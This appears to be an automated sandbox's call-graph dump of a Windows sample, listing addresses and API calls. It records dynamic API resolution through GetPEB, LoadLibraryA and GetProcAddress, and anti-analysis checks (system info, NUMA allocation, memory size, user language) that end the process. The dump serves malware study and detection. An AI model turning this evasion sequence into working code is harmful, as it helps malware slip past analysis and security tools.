57131->57132 57133 30045c0 34 API calls 57132->57133 57134 3002643 57133->57134 57135 30045c0 34 API calls 57134->57135 57136 300265c 57135->57136 57137 30045c0 34 API calls 57136->57137 57138 3002675 57137->57138 57139 30045c0 34 API calls 57138->57139 57140 300268e 57139->57140 57141 3019860 57140->57141 57400 3019750 GetPEB 57141->57400 57143 3019868 57144 3019a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 57143->57144 57147 301987a 57143->57147 57145 3019af4 GetProcAddress 57144->57145 57146 3019b0d 57144->57146 57145->57146 57148 3019b46 57146->57148 57149 3019b16 GetProcAddress GetProcAddress 57146->57149 57150 301988c 21 API calls 57147->57150 57151 3019b68 57148->57151 57152 3019b4f GetProcAddress 57148->57152 57149->57148 57150->57144 57153 3019b71 GetProcAddress 57151->57153 57154 3019b89 57151->57154 57152->57151 57153->57154 57155 3016a00 57154->57155 57156 3019b92 GetProcAddress GetProcAddress 57154->57156 57157 301a740 57155->57157 57156->57155 57158 301a750 57157->57158 57159 3016a0d 57158->57159 57160 301a77e lstrcpy 57158->57160 57161 30011d0 CreateDCA GetDeviceCaps ReleaseDC 57159->57161 57160->57159 57162 3001217 57161->57162 57163 300120f ExitProcess 57161->57163 57164 3001160 GetSystemInfo 57162->57164 57165 3001184 57164->57165 57166 300117c ExitProcess 57164->57166 57167 3001110 GetCurrentProcess VirtualAllocExNuma 57165->57167 57168 3001141 ExitProcess 57167->57168 57169 3001149 57167->57169 57401 30010a0 VirtualAlloc 57169->57401 57172 3001220 57405 30189b0 57172->57405 57175 3001249 __aulldiv 57176 300129a 57175->57176 57177 3001292 ExitProcess 57175->57177 57178 3016770 GetUserDefaultLangID 57176->57178 57179 30167d3 GetUserDefaultLCID 57178->57179 57180 3016792 57178->57180 57179->57028 57180->57179 57181 30167c1 ExitProcess 57180->57181 57182 30167a3 ExitProcess 57180->57182 57183 30167b7 ExitProcess 57180->57183 57184 30167cb ExitProcess 57180->57184 57185 30167ad ExitProcess 57180->57185 57407 301a710 57186->57407 57188 301a9c1 lstrlen 57190 301a9e0 57188->57190 57189 301aa18 57408 301a7a0 57189->57408 57190->57189 57192 301a9fa lstrcpy lstrcat 57190->57192 57192->57189 57193 301aa24 57193->57033 57195 301a8bb 57194->57195 57196 301a90b 57195->57196 57197 301a8f9 lstrcpy 57195->57197 57196->57043 57197->57196 57412 3016820 57198->57412 57200 301698e 57201 3016998 sscanf 57200->57201 57441 301a800 57201->57441 57203 30169aa SystemTimeToFileTime SystemTimeToFileTime 57204 30169e0 57203->57204 57205 30169ce 57203->57205 57207 3015b10 57204->57207 57205->57204 57206 30169d8 ExitProcess 57205->57206 57208 3015b1d 57207->57208 57209 301a740 lstrcpy 57208->57209 57210 3015b2e 57209->57210 57443 301a820 lstrlen 57210->57443 57213 301a820 2 API calls 57214 3015b64 57213->57214 57215 301a820 2 API calls 57214->57215 57216 3015b74 57215->57216 57447 3016430 57216->57447 57219 301a820 2 API calls 57220 3015b93 57219->57220 57221 301a820 2 API calls 57220->57221 57222 3015ba0 57221->57222 57223 301a820 2 API calls 57222->57223 57224 3015bad 57223->57224 57225 301a820 2 API calls 57224->57225 57226 3015bf9 57225->57226 57456 30026a0 57226->57456 57234 3015cc3 57235 3016430 lstrcpy 57234->57235 57236 3015cd5 57235->57236 57237 301a7a0 lstrcpy 57236->57237 57238 3015cf2 57237->57238 57239 301a9b0 4 API calls 57238->57239 57240 3015d0a 57239->57240 57241 301a8a0 lstrcpy 57240->57241 57242 3015d16 57241->57242 57243 301a9b0 4 API calls 57242->57243 57244 3015d3a 57243->57244 57245 301a8a0 lstrcpy 57244->57245 57246 3015d46 57245->57246 57247 301a9b0 4 API calls 57246->57247 57248 3015d6a 57247->57248 57249 301a8a0 lstrcpy 57248->57249 57250 3015d76 57249->57250 57251 301a740 lstrcpy 57250->57251 57252 3015d9e 57251->57252 58182 3017500 GetWindowsDirectoryA 57252->58182 57255 301a7a0 lstrcpy 57256 3015db8 57255->57256 58192 3004880 57256->58192 57258 3015dbe 58338 30117a0 57258->58338 57260 3015dc6 57261 301a740 lstrcpy 57260->57261 57262 3015de9 57261->57262 57263 3001590 lstrcpy 57262->57263 57264 3015dfd 57263->57264 58358 3005960 57264->58358 57266 3015e03 58504 3011050 57266->58504 57268 3015e0e 57269 301a740 lstrcpy 57268->57269 57270 3015e32 57269->57270 57271 3001590 lstrcpy 57270->57271 57272 3015e46 57271->57272 57273 3005960 39 API calls 57272->57273 57274 3015e4c 57273->57274 58511 3010d90 57274->58511 57276 3015e57 57277 301a740 lstrcpy 57276->57277 57278 3015e79 57277->57278 57279 3001590 lstrcpy 57278->57279 57280 3015e8d 57279->57280 57281 3005960 39 API calls 57280->57281 57282 3015e93 57281->57282 58521 3010f40 57282->58521 57284 3015e9e 57285 3001590 lstrcpy 57284->57285 57286 3015eb5 57285->57286 58529 3011a10 57286->58529 57288 3015eba 57289 301a740 lstrcpy 57288->57289 57290 3015ed6 57289->57290 57397 3004697 57396->57397 57398 30046ac 11 API calls 57397->57398 57399 300474f 6 API calls 57397->57399 57398->57397 57399->57056 57400->57143 57402 30010c2 codecvt 57401->57402 57403 30010fd 57402->57403 57404 30010e2 VirtualFree 57402->57404 57403->57172 57404->57403 57406 3001233 GlobalMemoryStatusEx 57405->57406 57406->57175 57407->57188 57409 301a7c2 57408->57409 57410 301a7ec 57409->57410 57411 301a7da lstrcpy 57409->57411 57410->57193 57411->57410 57413 301a740 lstrcpy 57412->57413 57414 3016833 57413->57414 57415 301a9b0 4 API calls 57414->57415 57416 3016845 57415->57416 57417 301a8a0 lstrcpy 57416->57417 57418 301684e 57417->57418 57419 301a9b0 4 API calls 57418->57419 57420 3016867 57419->57420 57421 301a8a0 lstrcpy 57420->57421 57422 3016870 57421->57422 57423 301a9b0 4 API calls 57422->57423 57424 301688a 57423->57424 57425 301a8a0 lstrcpy 57424->57425 57426 3016893 57425->57426 57427 301a9b0 4 API calls 57426->57427 57428 30168ac 57427->57428 57429 301a8a0 lstrcpy 57428->57429 57430 30168b5 57429->57430 57431 301a9b0 4 API calls 57430->57431 57432 30168cf 57431->57432 57433 301a8a0 lstrcpy 57432->57433 57434 30168d8 57433->57434 57435 301a9b0 4 API calls 57434->57435 57436 30168f3 57435->57436 57437 301a8a0 lstrcpy 57436->57437 57438 30168fc 57437->57438 57439 301a7a0 lstrcpy 57438->57439 57440 3016910 57439->57440 57440->57200 57442 301a812 57441->57442 57442->57203 57444 301a83f 57443->57444 57445 3015b54 57444->57445 57446 301a87b lstrcpy 57444->57446 57445->57213 57446->57445 57448 301a8a0 lstrcpy 57447->57448 57449 3016443 57448->57449 57450 301a8a0 lstrcpy 57449->57450 57451 3016455 57450->57451 57452 301a8a0 lstrcpy 57451->57452 57453 3016467 57452->57453 57454 301a8a0 lstrcpy 57453->57454 57455 3015b86 57454->57455 57455->57219 57457 30045c0 34 API calls 57456->57457 57458 30026b4 57457->57458 57459 30045c0 34 API calls 57458->57459 57460 30026d7 57459->57460 57461 30045c0 34 API calls 57460->57461 57462 30026f0 57461->57462 57463 30045c0 34 API calls 57462->57463 57464 3002709 57463->57464 57465 30045c0 34 API calls 57464->57465 57466 3002736 57465->57466 57467 30045c0 34 API calls 57466->57467 57468 300274f 57467->57468 57469 30045c0 34 API calls 57468->57469 57470 3002768 57469->57470 57471 30045c0 34 API calls 57470->57471 57472 3002795 57471->57472 57473 30045c0 34 API calls 57472->57473 57474 30027ae 57473->57474 57475 30045c0 34 API calls 57474->57475 57476 30027c7 57475->57476 57477 30045c0 34 API calls 57476->57477 57478 30027e0 57477->57478 57479 30045c0 34 API calls 57478->57479 57480 30027f9 57479->57480 57481 30045c0 34 API calls 57480->57481 57482 3002812 57481->57482 57483 30045c0 34 API calls 57482->57483 57484 300282b 57483->57484 57485 30045c0 34 API calls 57484->57485 57486 3002844 57485->57486 57487 30045c0 34 API calls 57486->57487 57488 300285d 57487->57488 57489 30045c0 34 API calls 57488->57489 57490 3002876 57489->57490 57491 30045c0 34 API calls 57490->57491 57492 300288f 57491->57492 57493 30045c0 34 API calls 57492->57493 57494 30028a8 57493->57494 57495 30045c0 34 API calls 57494->57495 57496 30028c1 57495->57496 57497 30045c0 34 API calls 57496->57497 57498 30028da 57497->57498 57499 30045c0 34 API calls 57498->57499 57500 30028f3 57499->57500 57501 30045c0 34 API calls 57500->57501 57502 300290c 57501->57502 57503 30045c0 34 API calls 57502->57503 57504 3002925 57503->57504 57505 30045c0 34 API calls 57504->57505 57506 300293e 57505->57506 57507 30045c0 34 API calls 57506->57507 57508 3002957 57507->57508 57509 30045c0 34 API calls 57508->57509 57510 3002970 57509->57510 57511 30045c0 34 API calls 57510->57511 57512 3002989 57511->57512 57513 30045c0 34 API calls 57512->57513 57514 30029a2 57513->57514 57515 30045c0 34 API calls 57514->57515 57516 30029bb 57515->57516 57517 30045c0 34 API calls 57516->57517 57518 30029d4 57517->57518 57519 30045c0 34 API calls 57518->57519 57520 30029ed 57519->57520 57521 30045c0 34 API calls 57520->57521 57522 3002a06 57521->57522 57523 30045c0 34 API calls 57522->57523 57524 3002a1f 57523->57524 57525 30045c0 34 API calls 57524->57525 57526 3002a38 57525->57526 57527 30045c0 34 API calls 57526->57527 57528 3002a51 57527->57528 57529 30045c0 34 API calls 57528->57529 57530 3002a6a 57529->57530 57531 30045c0 34 API calls 57530->57531 57532 3002a83 57531->57532 57533 30045c0 34 API calls 57532->57533 57534 3002a9c 57533->57534 57535 30045c0 34 API calls 57534->57535 57536 3002ab5 57535->57536 57537 30045c0 34 API calls 57536->57537 57538 3002ace 57537->57538 57539 30045c0 34 API calls 57538->57539 57540 3002ae7 57539->57540 57541 30045c0 34 API calls 57540->57541 57542 3002b00 57541->57542 57543 30045c0 34 API calls 57542->57543 57544 3002b19 57543->57544 57545 30045c0 34 API calls 57544->57545 57546 3002b32 57545->57546 57547 30045c0 34 API calls 57546->57547 57548 3002b4b 57547->57548 57549 30045c0 34 API calls 57548->57549 57550 3002b64 57549->57550 57551 30045c0 34 API calls 57550->57551 57552 3002b7d 57551->57552 57553 30045c0 34 API calls 57552->57553 57554 3002b96 57553->57554 57555 30045c0 34 API calls 57554->57555 57556 3002baf 57555->57556 57557 30045c0 34 API calls 57556->57557 57558 3002bc8 57557->57558 57559 30045c0 34 API calls 57558->57559 57560 3002be1 57559->57560 57561 30045c0 34 API calls 57560->57561 57562 3002bfa 57561->57562 57563 30045c0 34 API calls 57562->57563 57564 3002c13 57563->57564 57565 30045c0 34 API calls 57564->57565 57566 3002c2c 57565->57566 57567 30045c0 34 API calls 57566->57567 57568 3002c45 57567->57568 57569 30045c0 34 API calls 57568->57569 57570 3002c5e 57569->57570 57571 30045c0 34 API calls 57570->57571 57572 3002c77 57571->57572 57573 30045c0 34 API calls 57572->57573 57574 3002c90 57573->57574 57575 30045c0 34 API calls 57574->57575 57576 3002ca9 57575->57576 57577 30045c0 34 API calls 57576->57577 57578 3002cc2 57577->57578 57579 30045c0 34 API calls 57578->57579 57580 3002cdb 57579->57580 57581 30045c0 34 API calls 57580->57581 57582 3002cf4 57581->57582 57583 30045c0 34 API calls 57582->57583 57584 3002d0d 57583->57584 57585 30045c0 34 API calls 57584->57585 57586 3002d26 57585->57586 57587 30045c0 34 API calls 57586->57587 57588 3002d3f 57587->57588 57589 30045c0 34 API calls 57588->57589 57590 3002d58 57589->57590 57591 30045c0 34 API calls 57590->57591 57592 3002d71 57591->57592 57593 30045c0 34 API calls 57592->57593 57594 3002d8a 57593->57594 57595 30045c0 34 API calls 57594->57595 57596 3002da3 57595->57596 57597 30045c0 34 API calls 57596->57597 57598 3002dbc 57597->57598 57599 30045c0 34 API calls 57598->57599 57600 3002dd5 57599->57600 57601 30045c0 34 API calls 57600->57601 57602 3002dee 57601->57602 57603 30045c0 34 API calls 57602->57603 57604 3002e07 57603->57604 57605 30045c0 34 API calls 57604->57605 57606 3002e20 57605->57606 57607 30045c0 34 API calls 57606->57607 57608 3002e39 57607->57608 57609 30045c0 34 API calls 57608->57609 57610 3002e52 57609->57610 57611 30045c0 34 API calls 57610->57611 57612 3002e6b 57611->57612 57613 30045c0 34 API calls 57612->57613 57614 3002e84 57613->57614 57615 30045c0 34 API calls 57614->57615 57616 3002e9d 57615->57616 57617 30045c0 34 API calls 57616->57617 57618 3002eb6 57617->57618 57619 30045c0 34 API calls 57618->57619 57620 3002ecf 57619->57620 57621 30045c0 34 API calls 57620->57621 57622 3002ee8 57621->57622 57623 30045c0 34 API calls 57622->57623 57624 3002f01 57623->57624 57625 30045c0 34 API calls 57624->57625 57626 3002f1a 57625->57626 57627 30045c0 34 API calls 57626->57627 57628 3002f33 57627->57628 57629 30045c0 34 API calls 57628->57629 57630 3002f4c 57629->57630 57631 30045c0 34 API calls 57630->57631 57632 3002f65 57631->57632 57633 30045c0 34 API calls 57632->57633 57634 3002f7e 57633->57634 57635 30045c0 34 API calls 57634->57635 57636 3002f97 57635->57636 57637 30045c0 34 API calls 57636->57637 57638 3002fb0 57637->57638 57639 30045c0 34 API calls 57638->57639 57640 3002fc9 57639->57640 57641 30045c0 34 API calls 57640->57641 57642 3002fe2 57641->57642 57643 30045c0 34 API calls 57642->57643 57644 3002ffb 57643->57644 57645 30045c0 34 API calls 57644->57645 57646 3003014 57645->57646 57647 30045c0 34 API calls 57646->57647 57648 300302d 57647->57648 57649 30045c0 34 API calls 57648->57649 57650 3003046 57649->57650 57651 30045c0 34 API calls 57650->57651 57652 300305f 57651->57652 57653 30045c0 34 API calls 57652->57653 57654 3003078 57653->57654 57655 30045c0 34 API calls 57654->57655 57656 3003091 57655->57656 57657 30045c0 34 API calls 57656->57657 57658 30030aa 57657->57658 57659 30045c0 34 API calls 57658->57659 57660 30030c3 57659->57660 57661 30045c0 34 API calls 57660->57661 57662 30030dc 57661->57662 57663 30045c0 34 API calls 57662->57663 57664 30030f5 57663->57664 57665 30045c0 34 API calls 57664->57665 57666 300310e 57665->57666 57667 30045c0 34 API calls 57666->57667 57668 3003127 57667->57668 57669 30045c0 34 API calls 57668->57669 57670 3003140 57669->57670 57671 30045c0 34 API calls 57670->57671 57672 3003159 57671->57672 57673 30045c0 34 API calls 57672->57673 57674 3003172 57673->57674 57675 30045c0 34 API calls 57674->57675 57676 300318b 57675->57676 57677 30045c0 34 API calls 57676->57677 57678 30031a4 57677->57678 57679 30045c0 34 API calls 57678->57679 57680 30031bd 57679->57680 57681 30045c0 34 API calls 57680->57681 57682 30031d6 57681->57682 57683 30045c0 34 API calls 57682->57683 57684 30031ef 57683->57684 57685 30045c0 34 API calls 57684->57685 57686 3003208 57685->57686 57687 30045c0 34 API calls 57686->57687 57688 3003221 57687->57688 57689 30045c0 34 API calls 57688->57689 57690 300323a 57689->57690 57691 30045c0 34 API calls 57690->57691 57692 3003253 57691->57692 57693 30045c0 34 API calls 57692->57693 57694 300326c 57693->57694 57695 30045c0 34 API calls 57694->57695 57696 3003285 57695->57696 57697 30045c0 34 API calls 57696->57697 57698 300329e 57697->57698 57699 30045c0 34 API calls 57698->57699 57700 30032b7 57699->57700 57701 30045c0 34 API calls 57700->57701 57702 30032d0 57701->57702 57703 30045c0 34 API calls 57702->57703 57704 30032e9 57703->57704 57705 30045c0 34 API calls 57704->57705 57706 3003302 57705->57706 57707 30045c0 34 API calls 57706->57707 57708 300331b 57707->57708 57709 30045c0 34 API calls 57708->57709 57710 3003334 57709->57710 57711 30045c0 34 API calls 57710->57711 57712 300334d 57711->57712 57713 30045c0 34 API calls 57712->57713 57714 3003366 57713->57714 57715 30045c0 34 API calls 57714->57715 57716 300337f 57715->57716 57717 30045c0 34 API calls 57716->57717 57718 3003398 57717->57718 57719 30045c0 34 API calls 57718->57719 57720 30033b1 57719->57720 57721 30045c0 34 API calls 57720->57721 57722 30033ca 57721->57722 57723 30045c0 34 API calls 57722->57723 57724 30033e3 57723->57724 57725 30045c0 34 API calls 57724->57725 57726 30033fc 57725->57726 57727 30045c0 34 API calls 57726->57727 57728 3003415 57727->57728 57729 30045c0 34 API calls 57728->57729 57730 300342e 57729->57730 57731 30045c0 34 API calls 57730->57731 57732 3003447 57731->57732 57733 30045c0 34 API calls 57732->57733 57734 3003460 57733->57734 57735 30045c0 34 API calls 57734->57735 57736 3003479 57735->57736 57737 30045c0 34 API calls 57736->57737 57738 3003492 57737->57738 57739 30045c0 34 API calls 57738->57739 57740 30034ab 57739->57740 57741 30045c0 34 API calls 57740->57741 57742 30034c4 57741->57742 57743 30045c0 34 API calls 57742->57743 57744 30034dd 57743->57744 57745 30045c0 34 API calls 57744->57745 57746 30034f6 57745->57746 57747 30045c0 34 API calls 57746->57747 57748 300350f 57747->57748 57749 30045c0 34 API calls 57748->57749 57750 3003528 57749->57750 57751 30045c0 34 API calls 57750->57751 57752 3003541 57751->57752 57753 30045c0 34 API calls 57752->57753 57754 300355a 57753->57754 57755 30045c0 34 API calls 57754->57755 57756 3003573 57755->57756 57757 30045c0 34 API calls 57756->57757 57758 300358c 57757->57758 57759 30045c0 34 API calls 57758->57759 57760 30035a5 57759->57760 57761 30045c0 34 API calls 57760->57761 57762 30035be 57761->57762 57763 30045c0 34 API calls 57762->57763 57764 30035d7 57763->57764 57765 30045c0 34 API calls 57764->57765 57766 30035f0 57765->57766 57767 30045c0 34 API calls 57766->57767 57768 3003609 57767->57768 57769 30045c0 34 API calls 57768->57769 57770 3003622 57769->57770 57771 30045c0 34 API calls 57770->57771 57772 300363b 57771->57772 57773 30045c0 34 API calls 57772->57773 57774 3003654 57773->57774 57775 30045c0 34 API calls 57774->57775 57776 300366d 57775->57776 57777 30045c0 34 API calls 57776->57777 57778 3003686 57777->57778 57779 30045c0 34 API calls 57778->57779 57780 300369f 57779->57780 57781 30045c0 34 API calls 57780->57781 57782 30036b8 57781->57782 57783 30045c0 34 API calls 57782->57783 57784 30036d1 57783->57784 57785 30045c0 34 API calls 57784->57785 57786 30036ea 57785->57786 57787 30045c0 34 API calls 57786->57787 57788 3003703 57787->57788 57789 30045c0 34 API calls 57788->57789 57790 300371c 57789->57790 57791 30045c0 34 API calls 57790->57791 57792 3003735 57791->57792 57793 30045c0 34 API calls 57792->57793 57794 300374e 57793->57794 57795 30045c0 34 API calls 57794->57795 57796 3003767 57795->57796 57797 30045c0 34 API calls 57796->57797 57798 3003780 57797->57798 57799 30045c0 34 API calls 57798->57799 57800 3003799 57799->57800 57801 30045c0 34 API calls 57800->57801 57802 30037b2 57801->57802 57803 30045c0 34 API calls 57802->57803 57804 30037cb 57803->57804 57805 30045c0 34 API calls 57804->57805 57806 30037e4 57805->57806 57807 30045c0 34 API calls 57806->57807 57808 30037fd 57807->57808 57809 30045c0 34 API calls 57808->57809 57810 3003816 57809->57810 57811 30045c0 34 API calls 57810->57811 57812 300382f 57811->57812 57813 30045c0 34 API calls 57812->57813 57814 3003848 57813->57814 57815 30045c0 34 API calls 57814->57815 57816 3003861 57815->57816 57817 30045c0 34 API calls 57816->57817 57818 300387a 57817->57818 57819 30045c0 34 API calls 57818->57819 57820 3003893 57819->57820 57821 30045c0 34 API calls 57820->57821 57822 30038ac 57821->57822 57823 30045c0 34 API calls 57822->57823 57824 30038c5 57823->57824 57825 30045c0 34 API calls 57824->57825 57826 30038de 57825->57826 57827 30045c0 34 API calls 57826->57827 57828 30038f7 57827->57828 57829 30045c0 34 API calls 57828->57829 57830 3003910 57829->57830 57831 30045c0 34 API calls 57830->57831 57832 3003929 57831->57832 57833 30045c0 34 API calls 57832->57833 57834 3003942 57833->57834 57835 30045c0 34 API calls 57834->57835 57836 300395b 57835->57836 57837 30045c0 34 API calls 57836->57837 57838 3003974 57837->57838 57839 30045c0 34 API calls 57838->57839 57840 300398d 57839->57840 57841 30045c0 34 API calls 57840->57841 57842 30039a6 57841->57842 57843 30045c0 34 API calls 57842->57843 57844 30039bf 57843->57844 57845 30045c0 34 API calls 57844->57845 57846 30039d8 57845->57846 57847 30045c0 34 API calls 57846->57847 57848 30039f1 57847->57848 57849 30045c0 34 API calls 57848->57849 57850 3003a0a 57849->57850 57851 30045c0 34 API calls 57850->57851 57852 3003a23 57851->57852 57853 30045c0 34 API calls 57852->57853 57854 3003a3c 57853->57854 57855 30045c0 34 API calls 57854->57855 57856 3003a55 57855->57856 57857 30045c0 34 API calls 57856->57857 57858 3003a6e 57857->57858 57859 30045c0 34 API calls 57858->57859 57860 3003a87 57859->57860 57861 30045c0 34 API calls 57860->57861 57862 3003aa0 57861->57862 57863 30045c0 34 API calls 57862->57863 57864 3003ab9 57863->57864 57865 30045c0 34 API calls 57864->57865 57866 3003ad2 57865->57866 57867 30045c0 34 API calls 57866->57867 57868 3003aeb 57867->57868 57869 30045c0 34 API calls 57868->57869 57870 3003b04 57869->57870 57871 30045c0 34 API calls 57870->57871 57872 3003b1d 57871->57872 57873 30045c0 34 API calls 57872->57873 57874 3003b36 57873->57874 57875 30045c0 34 API calls 57874->57875 57876 3003b4f 57875->57876 57877 30045c0 34 API calls 57876->57877 57878 3003b68 57877->57878 57879 30045c0 34 API calls 57878->57879 57880 3003b81 57879->57880 57881 30045c0 34 API calls 57880->57881 57882 3003b9a 57881->57882 57883 30045c0 34 API calls 57882->57883 57884 3003bb3 57883->57884 57885 30045c0 34 API calls 57884->57885 57886 3003bcc 57885->57886 57887 30045c0 34 API calls 57886->57887 57888 3003be5 57887->57888 57889 30045c0 34 API calls 57888->57889 57890 3003bfe 57889->57890 57891 30045c0 34 API calls 57890->57891 57892 3003c17 57891->57892 57893 30045c0 34 API calls 57892->57893 57894 3003c30 57893->57894 57895 30045c0 34 API calls 57894->57895 57896 3003c49 57895->57896 57897 30045c0 34 API calls 57896->57897 57898 3003c62 57897->57898 57899 30045c0 34 API calls 57898->57899 57900 3003c7b 57899->57900 57901 30045c0 34 API calls 57900->57901 57902 3003c94 57901->57902 57903 30045c0 34 API calls 57902->57903 57904 3003cad 57903->57904 57905 30045c0 34 API calls 57904->57905 57906 3003cc6 57905->57906 57907 30045c0 34 API calls 57906->57907 57908 3003cdf 57907->57908 57909 30045c0 34 API calls 57908->57909 57910 3003cf8 57909->57910 57911 30045c0 34 API calls 57910->57911 57912 3003d11 57911->57912 57913 30045c0 34 API calls 57912->57913 57914 3003d2a 57913->57914 57915 30045c0 34 API calls 57914->57915 57916 3003d43 57915->57916 57917 30045c0 34 API calls 57916->57917 57918 3003d5c 57917->57918 57919 30045c0 34 API calls 57918->57919 57920 3003d75 57919->57920 57921 30045c0 34 API calls 57920->57921 57922 3003d8e 57921->57922 57923 30045c0 34 API calls 57922->57923 57924 3003da7 57923->57924 57925 30045c0 34 API calls 57924->57925 57926 3003dc0 57925->57926 57927 30045c0 34 API calls 57926->57927 57928 3003dd9 57927->57928 57929 30045c0 34 API calls 57928->57929 57930 3003df2 57929->57930 57931 30045c0 34 API calls 57930->57931 57932 3003e0b 57931->57932 57933 30045c0 34 API calls 57932->57933 57934 3003e24 57933->57934 57935 30045c0 34 API calls 57934->57935 57936 3003e3d 57935->57936 57937 30045c0 34 API calls 57936->57937 57938 3003e56 57937->57938 57939 30045c0 34 API calls 57938->57939 57940 3003e6f 57939->57940 57941 30045c0 34 API calls 57940->57941 57942 3003e88 57941->57942 57943 30045c0 34 API calls 57942->57943 57944 3003ea1 57943->57944 57945 30045c0 34 API calls 57944->57945 57946 3003eba 57945->57946 57947 30045c0 34 API calls 57946->57947 57948 3003ed3 57947->57948 57949 30045c0 34 API calls 57948->57949 57950 3003eec 57949->57950 57951 30045c0 34 API calls 57950->57951 57952 3003f05 57951->57952 57953 30045c0 34 API calls 57952->57953 57954 3003f1e 57953->57954 57955 30045c0 34 API calls 57954->57955 57956 3003f37 57955->57956 57957 30045c0 34 API calls 57956->57957 57958 3003f50 57957->57958 57959 30045c0 34 API calls 57958->57959 57960 3003f69 57959->57960 57961 30045c0 34 API calls 57960->57961 57962 3003f82 57961->57962 57963 30045c0 34 API calls 57962->57963 57964 3003f9b 57963->57964 57965 30045c0 34 API calls 57964->57965 57966 3003fb4 57965->57966 57967 30045c0 34 API calls 57966->57967 57968 3003fcd 57967->57968 57969 30045c0 34 API calls 57968->57969 57970 3003fe6 57969->57970 57971 30045c0 34 API calls 57970->57971 57972 3003fff 57971->57972 57973 30045c0 34 API calls 57972->57973 57974 3004018 57973->57974 57975 30045c0 34 API calls 57974->57975 57976 3004031 57975->57976 57977 30045c0 34 API calls 57976->57977 57978 300404a 57977->57978 57979 30045c0 34 API calls 57978->57979 57980 3004063 57979->57980 57981 30045c0 34 API calls 57980->57981 57982 300407c 57981->57982 57983 30045c0 34 API calls 57982->57983 57984 3004095 57983->57984 57985 30045c0 34 API calls 57984->57985 57986 30040ae 57985->57986 57987 30045c0 34 API calls 57986->57987 57988 30040c7 57987->57988 57989 30045c0 34 API calls 57988->57989 57990 30040e0 57989->57990 57991 30045c0 34 API calls 57990->57991 57992 30040f9 57991->57992 57993 30045c0 34 API calls 57992->57993 57994 3004112 57993->57994 57995 30045c0 34 API calls 57994->57995 57996 300412b 57995->57996 57997 30045c0 34 API calls 57996->57997 57998 3004144 57997->57998 57999 30045c0 34 API calls 57998->57999 58000 300415d 57999->58000 58001 30045c0 34 API calls 58000->58001 58002 3004176 58001->58002 58003 30045c0 34 API calls 58002->58003 58004 300418f 58003->58004 58005 30045c0 34 API calls 58004->58005 58006 30041a8 58005->58006 58007 30045c0 34 API calls 58006->58007 58008 30041c1 58007->58008 58009 30045c0 34 API calls 58008->58009 58010 30041da 58009->58010 58011 30045c0 34 API calls 58010->58011 58012 30041f3 58011->58012 58013 30045c0 34 API calls 58012->58013 58014 300420c 58013->58014 58015 30045c0 34 API calls 58014->58015 58016 3004225 58015->58016 58017 30045c0 34 API calls 58016->58017 58018 300423e 58017->58018 58019 30045c0 34 API calls 58018->58019 58020 3004257 58019->58020 58021 30045c0 34 API calls 58020->58021 58022 3004270 58021->58022 58023 30045c0 34 API calls 58022->58023 58024 3004289 58023->58024 58025 30045c0 34 API calls 58024->58025 58026 30042a2 58025->58026 58027 30045c0 34 API calls 58026->58027 58028 30042bb 58027->58028 58029 30045c0 34 API calls 58028->58029 58030 30042d4 58029->58030 58031 30045c0 34 API calls 58030->58031 58032 30042ed 58031->58032 58033 30045c0 34 API calls 58032->58033 58034 3004306 58033->58034 58035 30045c0 34 API calls 58034->58035 58036 300431f 58035->58036 58037 30045c0 34 API calls 58036->58037 58038 3004338 58037->58038 58039 30045c0 34 API calls 58038->58039 58040 3004351 58039->58040 58041 30045c0 34 API calls 58040->58041 58042 300436a 58041->58042 58043 30045c0 34 API calls 58042->58043 58044 3004383 58043->58044 58045 30045c0 34 API calls 58044->58045 58046 300439c 58045->58046 58047 30045c0 34 API calls 58046->58047 58048 30043b5 58047->58048 58049 30045c0 34 API calls 58048->58049 58050 30043ce 58049->58050 58051 30045c0 34 API calls 58050->58051 58052 30043e7 58051->58052 58053 30045c0 34 API calls 58052->58053 58054 3004400 58053->58054 58055 30045c0 34 API calls 58054->58055 58056 3004419 58055->58056 58057 30045c0 34 API calls 58056->58057 58058 3004432 58057->58058 58059 30045c0 34 API calls 58058->58059 58060 300444b 58059->58060 58061 30045c0 34 API calls 58060->58061 58062 3004464 58061->58062 58063 30045c0 34 API calls 58062->58063 58064 300447d 58063->58064 58065 30045c0 34 API calls 58064->58065 58066 3004496 58065->58066 58067 30045c0 34 API calls 58066->58067 58068 30044af 58067->58068 58069 30045c0 34 API calls 58068->58069 58070 30044c8 58069->58070 58071 30045c0 34 API calls 58070->58071 58072 30044e1 58071->58072 58073 30045c0 34 API calls 58072->58073 58074 30044fa 58073->58074 58075 30045c0 34 API calls 58074->58075 58076 3004513 58075->58076 58077 30045c0 34 API calls 58076->58077 58078 300452c 58077->58078 58079 30045c0 34 API calls 58078->58079 58080 3004545 58079->58080 58081 30045c0 34 API calls 58080->58081 58082 300455e 58081->58082 58083 30045c0 34 API calls 58082->58083 58084 3004577 58083->58084 58085 30045c0 34 API calls 58084->58085 58086 3004590 58085->58086 58087 30045c0 34 API calls 58086->58087 58088 30045a9 58087->58088 58089 3019c10 58088->58089 58090 3019c20 43 API calls 58089->58090 58091 301a036 8 API calls 58089->58091 58090->58091 58092 301a146 58091->58092 58093 301a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58091->58093 58094 301a153 8 API calls 58092->58094 58095 301a216 58092->58095 58093->58092 58094->58095 58096 301a298 58095->58096 58097 301a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58095->58097 58098 301a2a5 6 API calls 58096->58098 58099 301a337 58096->58099 58097->58096 58098->58099 58100 301a344 9 API calls 58099->58100 58101 301a41f 58099->58101 58100->58101 58102 301a4a2 58101->58102 58103 301a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58101->58103 58104 301a4ab GetProcAddress GetProcAddress 58102->58104 58105 301a4dc 58102->58105 58103->58102 58104->58105 58106 301a515 58105->58106 58107 301a4e5 GetProcAddress GetProcAddress 58105->58107 58108 301a612 58106->58108 58109 301a522 10 API calls 58106->58109 58107->58106 58110 301a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58108->58110 58111 301a67d 58108->58111 58109->58108 58110->58111 58112 301a686 GetProcAddress 58111->58112 58113 301a69e 58111->58113 58112->58113 58114 301a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 58113->58114 58115 3015ca3 58113->58115 58114->58115 58116 3001590 58115->58116 59186 3001670 58116->59186 58119 301a7a0 lstrcpy 58120 30015b5 58119->58120 58121 301a7a0 lstrcpy 58120->58121 58122 30015c7 58121->58122 58123 301a7a0 lstrcpy 58122->58123 58124 30015d9 58123->58124 58125 301a7a0 lstrcpy 